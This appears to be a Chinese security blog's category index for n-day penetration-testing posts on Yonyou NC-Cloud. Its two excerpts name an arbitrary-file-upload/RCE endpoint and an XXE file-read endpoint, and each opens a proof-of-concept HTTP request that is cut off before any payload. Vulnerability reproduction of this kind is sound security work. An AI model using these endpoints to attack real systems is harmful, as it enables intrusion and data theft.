随笔分类 - 渗透测试 / nday / 用友
用友-NC-Cloud存在任意文件上传/RCE
摘要:漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l
用友-NC-Cloud存在soapFormat-XXE 导致任意文件读取漏洞
摘要:漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0